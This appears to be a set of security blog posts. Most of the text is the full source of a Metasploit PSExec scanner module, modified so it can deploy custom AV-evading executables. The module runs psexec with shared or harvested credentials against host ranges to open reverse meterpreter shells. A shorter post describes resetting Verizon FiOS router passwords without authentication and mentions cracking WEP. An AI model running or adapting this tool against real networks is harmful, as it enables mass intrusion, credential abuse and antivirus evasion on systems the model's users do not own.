I’ve been experimenting with AWS EC2 instances quite a bit lately. I’ve also been tinkering with various aspects of the AWS API, and found it to be very powerful, and useful.
I blogged recently about a project where I slightly modified an existing tool called encroot to get a full disk encrypted Kali™ EC2 instance. Check it out on my employer’s blog.
Last year DarkOperator(Carlos Perez) released an awesome auxiliary module for the Metasploit Framework: the PSExec Scanner Auxiliary Module. This module allows you to use a set of credentials (or hashes) to run the psexec Metasploit module against a list of hosts. A very handy trick when you have a shared local admin account and want to get shells on a bunch of machines where those admin credentials work.
I simply added a few lines to his script that adds the EXE::Custom option, which allows you to specify a custom binary to use as a payload rather than have the psexec module create one on the fly. This is useful if you like to use a custom executable that already bypasses AV, since the stock Metasploit payloads often get caught by AV’s. You set the EXE::Custom option like you would any other option is msf, e.g. “set EXE::Custom /tmp/samba/revshell.exe”.
Be forewarned: Using the custom binary can take a little while longer to pop the box than when you run the module with the default options.
Below is the original script with my edits/additions highlighted. You can download the edited script here
##
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
#Slightly modified by pipefish to add the EXE::Custom option
require 'msf/core'
require 'rex'
class Metasploit3 'Auxiliary PSExec Scanner',
'Description' => %q{
PSExec scanner module that will run a psexec attack against a range of hosts
using either a set of credentials provided or the credential saved in the
current workspace database.
},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez '],
'Version' => '$Revision$'
))
register_options(
[
OptString.new('SMBUser', [false, 'SMB Username', nil]),
OptString.new('SMBPass', [false, 'SMB Password', nil]),
OptString.new('SMBDomain', [true, "SMB Domain", 'WORKGROUP']),
OptString.new('SHARE', [ true,
"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]),
OptString.new('RHOSTS', [true, 'Range of hosts to scan.', nil]),
OptInt.new('LPORT', [true, 'Local Port for payload to connect.', nil]),
OptString.new('LHOST', [true, 'Local Hosts for payload to connect.', nil]),
OptString.new('PAYLOAD', [true, 'Payload to use against Windows host',
"windows/meterpreter/reverse_tcp"]),
OptEnum.new('TYPE', [false,
'Type of credentials to use, manual for provided one, db for those found on the database',
'manual', ['db','manual']]),
OptString.new('OPTIONS',
[false, "Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.",
""]),
OptString.new('EXE::Custom', [false, 'Use custom exe instead of automatically generating a payload exe', nil]),
OptBool.new('HANDLER',
[ false, 'Start an Exploit Multi Handler to receive the connection', true]),
], self.class)
# no need for it
deregister_options('RPORT')
end
def setup()
# Set variables
pay_name = datastore['PAYLOAD']
lhost = datastore['LHOST']
lport = datastore['LPORT']
opts = datastore['OPTIONS']
if datastore['TYPE'] == "db"
print_status("Using the credentials found in the workspace database")
collect_hashes()
else
print_status("Using the username and password provided")
end
@pay = create_payload(pay_name,lhost,lport,opts)
create_multihand(pay_name,lhost,lport) if datastore['HANDLER']
end
# Run Method for when run command is issued
def run_host(ip)
if check_port(ip)
if datastore['TYPE'] == "manual"
if not datastore['SMBUser'].nil? and not datastore['SMBPass'].nil?
user = datastore['SMBUser']
pass = datastore['SMBPass']
dom = datastore['SMBDomain']
payload = datastore['PAYLOAD']
custexe = datastore['EXE::Custom']
print_status("Trying #{user}:#{pass}")
psexec(ip,user,pass,dom,payload,custexe)
return
end
else
@creds.each do |c|
user,pass = c.split(" ")
dom = datastore['SMBDomain']
payload = datastore['PAYLOAD']
custexe = datastore['EXE::Custom']
print_status("Trying #{user}:#{pass}")
psexec(ip,user,pass,dom,payload,custexe)
end
end
else
return
end
end
## Run psexec on a given IP
def psexec(ip,user,pass,dom,payload,custexe)
psexec = framework.modules.create("exploit/windows/smb/psexec")
psexec.share_datastore(@pay.datastore)
psexec.datastore['PAYLOAD'] = payload
psexec.datastore['MODULE_OWNER'] = self.owner
psexec.datastore['WORKSPACE'] = datastore["WORKSPACE"] if datastore["WORKSPACE"]
psexec.datastore['RHOST'] = ip
psexec.datastore['SMBUser'] = user
psexec.datastore['SMBPass'] = pass
psexec.datastore['SMBDomain'] = dom
if not datastore['EXE::Custom'].nil?
psexec.datastore['EXE::Custom'] = custexe
end
psexec.datastore['SHARE'] = datastore['SHARE']
psexec.datastore['RPORT'] = 445
psexec.datastore['ExitOnSession'] = false
psexec.datastore['DisablePayloadHandler'] = false
psexec.datastore['EXITFUNC'] = 'process'
psexec.datastore['VERBOSE'] = true
psexec.datastore['DisablePayloadHandler'] = true
psexec.datastore['ForceBlocking'] = true
psexec.options.validate(psexec.datastore)
psexec.exploit_simple(
'LocalInput' => self.user_input,
'LocalOutput' => self.user_output,
'Payload' => payload,
'Target' => 0,
'ForceBlocking' => true,
'RunAsJob' => false)
Rex::ThreadSafe.sleep(4)
end
def check_port(ip)
status = false
timeout = 1000
port = 445
begin
s = connect(false,
{
'RPORT' => 445,
'RHOST' => ip,
'ConnectTimeout' => (timeout / 1000.0)
}
)
print_status("#{ip}:#{port} - TCP OPEN")
status = true
rescue ::Rex::ConnectionRefused
vprint_status("#{ip}:#{port} - TCP closed")
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip}:#{port} exception #{e.class} #{e} #{e.backtrace}")
ensure
disconnect(s) rescue nil
end
return status
end
def collect_hashes
type = "smb_hash|password"
@creds = []
print_status("Collecting Hashes from the DB")
framework.db.workspace.creds.each do |cred|
if cred.active and cred.ptype =~ /#{type}/ and cred.user !~ /(SUPPORT|HelpAssistant|TsInternetUser|IWAM|Guest)/
@creds < mul.datastore['PAYLOAD'],
'LocalInput' => self.user_input,
'LocalOutput' => self.user_output,
'RunAsJob' => true
)
else
print_error("Could not start handler!")
end
end
end
David Sirrine, from Red Hat, talks about practical applications for iptables and Linux endpoint security at the April richSEC meeting.
You can reset the router password of most stock setups of Verizon’s FiOS Internet service without authorization, and without physical access. That is a bold statement, but one that I have found to be true every single time I test it out. And if I’ve found this out, chances are good that plenty of others have as well. I have called and emailed Verizon several times about this issue and have gotten a mix of “I didn’t know that was possible”, to “Yeah, that’s a value add feature for our customers”. Either way the big V has not addressed the problem. My hope is that someone brings this up to the President of Verizon Security Awesomeness and says “Uhh, we may need to rethink this one!”.
For brevity’s sake I’ll sum it up here: You can download the Verizon In Home Agent and reset the router password of any FiOS router. The only requirement is you be on the same network as the router. No authentication required (See picture, note it doesn’t ask for old password!).
For the long version expand the box below.
[learn_more caption=”Click to Expand The Long Story”] I found this issue out by accident, after I moved. I had Verizon come out and transfer my FiOS service to my new address. The tech was doing the usual stuff, then said “Now I have to verify connectivity. Do you have a computer we can use to test it out?”. I ambled up and set my laptop in front of him, which was running Ubuntu. The tech instantly stated, “Uh, we don’t officially support machines unless they’re a Windows PC.” I browsed the Internet and was satisfied. He said, “We have to run a program to test connectivity or I don’t get credit for the install”. The “program” in question was an exe. ~Sigh~ Ok, fine, so I booted up my Windows 7 VM. He plugged in a thumb drive and fired off some exe. Now, I won’t even go in to the fact that I would usually NEVER let anyone plug in a random thumb drive to my PC and run some exe, but this was a VM and I wanted him to finish, so I held my tongue. The exe launched some apps that looked like they were testing different aspects of my FiOS service. But for I’ll I know I was being enrolled in a botnet. But that’s neither here nor there.
When all the colors on the screen showed green he said “Now I’m going to show you about Verizon’s In Home Agent”. I didn’t feel like dealing with it, but he was in full on canned speech mode. “It let’s you diagnose issues, collect log info for support and do some other neat stuff, like reset the router password.” Fine, fine, get out thank you, enjoy your life tech-guy. When he left I went to log in to the router with the password he had left me (Password1). Of course wireless security was set to what Verizon always sets it to: WEP. I went in changed to WPA2 PSK, and changed the passphrase, then I went to change the password but accidentally closed the window before I did. Shucks… but wait… the In Home Agent screen was up and the option “Change Password” was sitting right there. Ok, I’ll bite. So i clicked it. It asked for a new password. It DID NOT ask for an old one. Hmm, so i typed in a new password. Then I tried to log into the router. My new password worked. Interesting. Well, maybe since the application was running earlier it cached the first password when i logged into the site… I dunno how, but maybe. So, I reboot and used the In Home Agent and changed the password to something new, without being prompted for the old one. Fascinating. I went to my neighbor later and asked if I could test something out. They owe me since I have fixed their computers for free, so they let me tinker. They let me connect to their network (which was WEP) and I ran the In Home Agent. I then preceded to change their router password without being asked for the original. Yikes.
[/learn_more]
My first call to Verizon, I explained how most times Verizon techs come out for a FiOS move or install they set wifi security to WEP. I was told this was because not all customers’ computers support WPAWPA2, and they want to ensure that their customers can use their wifi. Ok, but WEP can be cracked in minutes. There have been dozens of articles published on how to do it. But, that’s not the worst part. If i get on to a network (crack their WEP or am allowed in) all I have to do is run the In Home Agent and I can reset their router password. I dont have to MiTM them, nor find vulns in their PC’s to exploit, I can just own them at their gateway. Redirect DNS where I want, set new routes. “Hmm, I’ll inform my manager about your concerns”. That’s all I got the first call. Several other calls, and several emails later there has been no update to the In Home Agent.
I did get one tech who said “Well, I mean you know, if you’re on the network we figure you’re allowed to be… so you can reset the password I guess”. Ok, but if i crack the WEP I got on without being allowed to be… or if I’m a parent and I want to set parental controls or filters all my kid has to do is reset my router password and log in… ~sigh~ it doesn’t get through.
I guess a bullet point here is (obviously) don’t use WEP, and even if you use WPA2, be careful who you allow on your network. Any guest on your network can reset your router password. And, how often do you log in and check that, anyways?
Hopefully having this on the Interwebs will get them to wake up. Because a concerned customer’s harassment apparently can’t.
This is a video of an attack demo I gave at the richSEC meeting in January.
Pipefish 